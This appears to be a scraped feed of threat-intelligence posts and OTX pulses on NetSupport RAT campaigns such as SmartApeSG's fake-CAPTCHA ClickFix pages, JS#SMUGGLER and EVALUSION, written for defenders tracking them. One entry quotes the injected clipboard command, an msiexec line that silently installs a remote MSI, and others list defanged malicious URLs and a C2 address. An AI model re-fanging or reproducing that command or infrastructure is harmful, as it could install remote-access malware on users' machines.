Lmst

JS SMUGGLER Multi Stage Hidden iframes Obfuscated JavaScript Silent Redirectors NetSupport RAT Delivery

Pulse ID: 6939016e326fd6a1b64a4ad6
Pulse Link: https://otx.alienvault.com/pulse/6939016e326fd6a1b64a4ad6
Pulse Author: Tr1sa111
Created: 2025-12-10 05:13:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Java #JavaScript #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #bot #Tr1sa111

Campaign uses ClickFix page to push NetSupport RAT

The SmartApeSG campaign, also known as ZPHP or HANEYMANEY, has evolved from using fake browser update pages to employing ClickFix-style fake CAPTCHA pages. This campaign distributes malicious NetSupport RAT packages as its initial infection vector. The attack chain begins with an injected script on compromised websites, which, under certain conditions, displays a fake CAPTCHA page. When users interact with this page, malicious content is injected into the Windows clipboard, prompting users to paste and execute it. This leads to the download and installation of NetSupport RAT, which maintains persistence through a Start Menu shortcut. The campaign frequently changes domains, packages, and C2 servers to evade detection.

Pulse ID: 69370db0cd2bc81cbbe13d51
Pulse Link: https://otx.alienvault.com/pulse/69370db0cd2bc81cbbe13d51
Pulse Author: AlienVault
Created: 2025-12-08 17:41:04

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CAPTCHA #Clipboard #CyberSecurity #FakeBrowser #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PHP #RAT #SmartApeSg #Windows #bot #AlienVault

JS#SMUGGLER Deploying NetSupport RAT via Compromised Websites

JS#SMUGGLER is a web-based malware campaign that uses compromised
websites to deliver the NetSupport RAT

Pulse ID: 6937559768d29b8bfdeb42c9
Pulse Link: https://otx.alienvault.com/pulse/6937559768d29b8bfdeb42c9
Pulse Author: cryptocti
Created: 2025-12-08 22:47:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #bot #cryptocti

New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.

Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/

#JSsmuggler #Malware #Cybersecurity #Windows

SmartApeSG campaign uses ClickFix page to push NetSupport RAT

Pulse ID: 6936a7709dd0d1b331e8ad64
Pulse Link: https://otx.alienvault.com/pulse/6936a7709dd0d1b331e8ad64
Pulse Author: CyberHunter_NL
Created: 2025-12-08 10:24:48

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #SmartApeSg #bot #CyberHunter_NL

Technical Analysis of Matanbuchus 3.0

Matanbuchus, a C++ malicious downloader offered as Malware-as-a-Service since 2020, has evolved to version 3.0. It comprises a downloader and main module, utilizing obfuscation techniques like junk code, encrypted strings, and API hashing. The malware implements anti-analysis features, including an expiration date and persistence via scheduled tasks. It communicates using encrypted Protobufs over HTTP(S), supporting various commands for payload execution, data collection, and system manipulation. Matanbuchus has been associated with ransomware operations and used to distribute other malware like Rhadamanthys and NetSupport RAT.

Pulse ID: 692ff91584de642b1a8cbd3b
Pulse Link: https://otx.alienvault.com/pulse/692ff91584de642b1a8cbd3b
Pulse Author: AlienVault
Created: 2025-12-03 08:47:17

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #HTTP #InfoSec #Malware #MalwareAsAService #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #RansomWare #Rhadamanthys #bot #AlienVault

The 'Bear' attacks: what we learned about the phishing campaign targeting Russian organizations

A hacking group named NetMedved has been conducting phishing attacks against Russian organizations since October 2025. The campaign uses malicious LNK files disguised as business documents to deliver NetSupport RAT malware. The attackers employ various techniques including PowerShell scripts, finger protocol, and anti-analysis checks. They utilize multiple domains for payload delivery and command and control. The group's infrastructure overlaps with previous campaigns from 2024, suggesting an evolution of tactics rather than a new actor. NetMedved's operations involve social engineering, custom obfuscation, and abuse of legitimate tools to evade detection and maintain persistence on compromised systems.

Pulse ID: 6926cae8043aabe58197d11e
Pulse Link: https://otx.alienvault.com/pulse/6926cae8043aabe58197d11e
Pulse Author: AlienVault
Created: 2025-11-26 09:39:52

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #ICS #InfoSec #LNK #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #Russia #SocialEngineering #bot #AlienVault

EVALUSION Campaign Delivers Amatera Stealer and NetSupport...

The eSentire Threat Response Unit identified a malware campaign using ClickFix as an initial access vector to deploy Amatera Stealer and NetSupport RAT. Amatera Stealer is a rebranded version of ACR Stealer, with advanced evasion techniques like WoW64 SysCalls to bypass security solutions. It targets crypto-wallets, browsers, and messaging apps. The attack chain involves social engineering, PowerShell stages, and a .NET-based downloader. Amatera communicates with its C2 server using encrypted channels and can deploy additional payloads. The campaign selectively targets systems with valuable data or domain membership before deploying NetSupport RAT. Recommendations include disabling mshta.exe, restricting the Run prompt, implementing phishing awareness training, and using Next-Gen AV or EDR solutions.

Pulse ID: 691cf085ce463d915d5c5dc8
Pulse Link: https://otx.alienvault.com/pulse/691cf085ce463d915d5c5dc8
Pulse Author: AlienVault
Created: 2025-11-18 22:17:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #EDR #InfoSec #LUA #Malware #NET #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #SocialEngineering #ThreatResponseUnit #bot #eSentire #AlienVault

Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.

The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.

Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.

Thoughts on this growing reliance on execution through supposedly “trusted” system tools?

💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting

#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch

New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT

ISC diary: #SmartApeSG campaign uses #ClickFix page to push #NetSupportRAT https://isc.sans.edu/diary/32474

Neue EVALUSION‑ClickFix‑Kampagne:
Amatera‑Stealer und NetSupport‑RAT werden verbreitet

Cyber‑Security‑Forscher von eSentire haben eine EVALUSION genannte Malware‑Kampagne entdeckt, die das mittlerweile weit verbreitete ClickFix‑Social‑Engineering‑Muster nutzt, um den Amatera Stealer und das NetSupport RAT zu installieren.

Mehr: https://maniabel.work/archiv/265

#ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS

EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT
#AmateraStealer #NetSupportRAT
https://www.esentire.com/blog/evalusion-campaign-delivers-amatera-stealer-and-netsupport-rat

SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
https://isc.sans.edu/diary/32474

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a

Screenshot of a legitimate but compromised website displaying a #SmartApeSG fake CAPTCHA page for #FileFix style #ClickFix activity.

2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)

Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.

Other sites have injected script that redirects to the URL for the fake CAPTCHA page.

Direct example (compromised site --> script for CAPTCHA page):

- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Recirect example (compromised site --> Redirect URL --> script for CAPTCHA page):

- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Either way, you get the same CAPTCHA page.

IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt

cc: @monitorsg

Fake SmartApeSG injected script from first example.

Fake SmartApeSG injected script from second example.

2025-08-20 (Wednesday): #SmartApeSG for fake #CAPTCHA page with #ClickFix instructions that led to an MSI file for #NetSupport #RAT and the #NetSupportRAT infection led to #StealCv2.

Malware samples, a #pcap, and indicators at www.malware-traffic-analysis.net/2025/08/20/index.html

Fake CAPTHA page generated by SmartApeSG script injected into compromised website.

ClickFix instructions from the fake CAPTCHA page.

Traffic from the infection filtered in Wireshark.

Script and traffic to download and run MSI file to install NetSupport RAT

2025-07-15 (Tuesday): Tracking #SmartApeSG

The SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.

Compromised site (same as yesterday):

- medthermography[.]com

URLs for ClickFix style fake verification page:

- warpdrive[.]top/jjj/include.js
- warpdrive[.]top/jjj/index.php?W11WzmLj
- warpdrive[.]top/jjj/buffer.js?409a8bdbd9

Running the script for NetSupport RAT:

- sos-atlanta[.]com/lal.ps1
- sos-atlanta[.]com/lotu.zip?l=4773

#NetSupport RAT server (same as yesterday):

- 185.163.45[.]87:443

Traffic from an infection filtered in Wireshark and HTTPS URLs shown in Fiddler.

2025-07-14 (Monday): #SmartApeSG script injected into page from compromised website leads to #ClickFix style fake verification page. ClickFix-ing you way through this leads to a #NetSupportRAT infection.

Compromised site:

- medthermography[.]com

URLs for ClickFix style fake verification page:

- lebensversicherungvergleich[.]top/jjj/include.js
- lebensversicherungvergleich[.]top/jjj/index.php?OtKXgPVX
- lebensversicherungvergleich[.]top/jjj/buffer.js?4261984971

Running the script for NetSupport RAT:

- affordableasphalt-paving[.]com/lal.ps1
- affordableasphalt-paving[.]com/lotu.zip?l=3526

#NetSupport RAT server:

- 185.163.45[.]87:443